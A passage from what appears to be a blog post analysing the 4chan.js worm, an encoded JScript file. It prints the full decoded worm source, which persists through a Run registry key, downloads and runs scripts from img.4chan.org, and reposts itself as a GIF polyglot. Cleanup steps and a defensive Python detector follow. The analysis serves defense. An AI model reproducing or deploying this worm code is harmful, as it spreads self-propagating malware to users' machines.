t of encoding it was using, and folks pointed me to the post at the SAN Internet Storm Center:
But that had few details on how the encoding was done. Byte_Bucket from Pauldotcom pointed me at a tool called "Windows Script Encoder" from Microsoft that seems to be what was used. After some checking, the encoded part of the JSE starts with #@~^, which is also what the MS tool produces.
Once I knew Windows Script Encoder was used, I Googled around for a decoder. This site:
pointed me at a JSE decoder you can find here:
http://www.virtualconspiracy.com/content/scrdec/download
and it seems to work. Rather than explain what the script does in great detail you can just read the source here:
GIF89aI = "x1!þ÷";   // the GIF magic doubles as a JS assignment, so the file passes as an image
var xhr = new ActiveXObject("Msxml2.XMLHTTP");
var shell = new ActiveXObject("WScript.Shell");
var fso = new ActiveXObject("Scripting.FileSystemObject");
var ie = new ActiveXObject("InternetExplorer.Application");
"‰";   // stray string literals like this are no-ops left over from the obfuscation
shell.currentDirectory = fso.getSpecialFolder(2);   // 2 = the user's Temp folder
shell.run("cmd /c copy \"" + WSH.scriptFullName + "\" sys.jse");   // copies itself to Temp\sys.jse
try {
  "û";
  shell.regWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\sysjse", "wscript /b " + fso.getSpecialFolder(2) + "\\sys.jse");   // persistence via the Run key
} catch(e) {}
while(1) {
  try {
    xhr.open("get", "http://img.4chan.org/b/", 0);
    "ö";
    xhr.setRequestHeader("If-Modified-Since", new Date(0));
    xhr.send();
    var page = xhr.responseText;
    try {
      xhr.open("get", page.match(/<a href="(http:\/\/img\.4chan\.org\/b\/src\/\d+\....)/)[1], 0);
      "è";
      xhr.send();
      var im = new ActiveXObject("Adodb.Stream");
      im.mode = 3; im.type = 1; im.open();
      im.write(xhr.responseBody);
      im.saveToFile("j.jse", 2);
      "ÿ";
      shell.run("wscript /b j.jse");   // runs whatever "image" it just fetched as a script
    } catch(e) {}
    var bdry = (""+Math.random()).substr(2);
    var head = "\r\n--" + bdry + "\r\nContent-Disposition: form-data; name=";
    var part1 = fso.openTextFile("y", 2, 1);
    "Ó";
    part1.write(head + "resto\r\n\r\n" + page.match(/<span id="nothread(\d+)/)[1] + head + "upfile; filename=a.gif\r\n\r\n");
    part1.close();
    var part2 = fso.openTextFile("z", 2, 1);
    "ú";
    part2.write((""+Math.random()).substr(2) + head + "mode\r\n\r\nregist\r\n--" + bdry + "--\r\n");
    part2.close();
    shell.run("cmd /c copy /b y+sys.jse+z p", 0, 1);   // builds the multipart body with its own copy as the "image"
    var post = new ActiveXObject("Adodb.Stream");
    "Ù";
    post.mode = 3; post.type = 1; post.open();
    post.loadFromFile("p");
    try {
      ie.navigate("http://img.4chan.org/b/");
      do { WSH.sleep(100); "Å"; } while (ie.readyState != 4);
      ie.stop();
      ie.document.cookie = "nws_style=; expires=" + new Date(0) + "; path=/; domain=.4chan.org";
    } catch(e) {}
    "ö";
    xhr.open("post", "http://dat.4chan.org/b/imgboard.php", 0);
    xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=" + bdry);
    xhr.send(post);
    WSH.sleep(50000);
  } catch(e) {}
}
It seems the end goal was just to spam 4chan and get the user banned as a result. Cleanup and removal is about as simple as:
1. Kill the wscript process.
2. Remove the registry entry at HKCU\Software\Microsoft\Windows\CurrentVersion\Run\sysjse, or just use MSConfig to remove it from startup.
3. Remove sys.jse from your temp directory (most likely something similar to c:\Documents and Settings\YourUserName\Local Settings\Temp).
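To turn the two observations above (the #@~^ header that Windows Script Encoder emits, and the artifacts the cleanup steps remove: the sysjse Run value and sys.jse in Temp) into something repeatable, here is a small triage script. It is an added example written for this post, not the decoder linked above or anything from the malware; the sample file contents, the Run values and the temp folder it creates are constructed test data. The closing ^#~@ marker is the standard trailer of script-encoded files and is used only as a second signal; the regex for the Run value and the dropped-file names (sys.jse, j.jse) are taken from the decoded script.

```python
"""Triage helper for the encoded-JSE worm described above (added example, not the post's code)."""
import os
import re
import sys
import tempfile
from typing import Dict, Iterable, List

# Header that Windows Script Encoder puts at the start of the encoded region
# (the post's observation). Encoded files also end with the mirror-image marker.
SCRENC_START = b"#@~^"
SCRENC_END = b"^#~@"
GIF_MAGIC = b"GIF89a"

# The worm's Run value is "wscript /b <Temp>\sys.jse"; any wscript launching a
# .jse from a Run key is worth a look.
RUN_KEY = r"Software\Microsoft\Windows\CurrentVersion\Run"
SUSPICIOUS_RUN = re.compile(r"\bwscript(?:\.exe)?\b.*\.jse\b", re.IGNORECASE)

# Names the script writes into Temp: its own copy and the fetched "image".
# (It also uses y, z and p as scratch files, but those names are too generic to key on.)
DROPPED_NAMES = ("sys.jse", "j.jse")


def classify_blob(data: bytes) -> Dict[str, object]:
    """Look at one file's bytes for the script-encoder markers and the GIF polyglot trick."""
    start = data.find(SCRENC_START)
    has_trailer = start != -1 and data.rfind(SCRENC_END) > start
    return {
        "encoder_header": start if start != -1 else None,  # offset of #@~^ or None
        "encoder_trailer": has_trailer,
        # GIF magic in front of an encoded script: passes as an image, runs as a script
        "gif_polyglot": data.startswith(GIF_MAGIC) and start != -1,
    }


def suspicious_run_values(values: Dict[str, str]) -> Dict[str, str]:
    """Filter a {value_name: command} map of Run entries down to the suspicious ones."""
    return {name: cmd for name, cmd in values.items() if SUSPICIOUS_RUN.search(cmd)}


def read_run_values() -> Dict[str, str]:
    """Read HKCU\\...\\Run on Windows; returns {} on other platforms (no winreg there)."""
    if sys.platform != "win32":
        return {}
    import winreg  # only importable on Windows
    values: Dict[str, str] = {}
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, RUN_KEY) as key:
        index = 0
        while True:
            try:
                name, data, _ = winreg.EnumValue(key, index)
            except OSError:  # no more values
                break
            values[name] = str(data)
            index += 1
    return values


def dropped_scripts(temp_dir: str, names: Iterable[str] = DROPPED_NAMES) -> List[str]:
    """Return the paths of the known dropped script names that exist in temp_dir."""
    found = []
    for name in names:
        path = os.path.join(temp_dir, name)
        if os.path.isfile(path):
            found.append(path)
    return found


def demo() -> Dict[str, object]:
    """Run the checks over constructed samples (not real captures) and return the results."""
    samples = {
        "benign.gif": b"GIF89a\x01\x00\x01\x00\x80\x00\x00",
        "polyglot.gif": b'GIF89aI = "x"; #@~^MTIzNA==FAKEBODY==^#~@',  # constructed, not a real encoding
        "encoded.jse": b"#@~^MTIzNA==FAKEBODY==^#~@",
        "plain.js": b"var x = 1;",
    }
    run_values = {  # constructed Run entries; the first mirrors the worm's value
        "sysjse": r"wscript /b C:\Documents and Settings\user\Local Settings\Temp\sys.jse",
        "OneDrive": r"C:\Program Files\OneDrive.exe /background",
    }
    with tempfile.TemporaryDirectory() as tmp:
        with open(os.path.join(tmp, "sys.jse"), "wb") as fh:
            fh.write(samples["encoded.jse"])
        dropped = [os.path.basename(p) for p in dropped_scripts(tmp)]
    return {
        "files": {name: classify_blob(data) for name, data in samples.items()},
        "run_hits": suspicious_run_values(run_values),
        "dropped": dropped,
    }


if __name__ == "__main__":
    for section, result in demo().items():
        print(section, result)
    # On a live Windows box, also check the real Run key and the real Temp folder:
    print("live run hits:", suspicious_run_values(read_run_values()))
    print("live dropped:", dropped_scripts(tempfile.gettempdir()))
```

The file check deliberately searches for #@~^ anywhere in the file rather than only at offset 0, because in this sample the GIF header comes first; a scanner that only looks at the first bytes would file it as an image.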
For more info on this Malware, check out:
http://encyclopediadramatica.com/4chan.js#It_returns.2C_again (NSFW in some cases)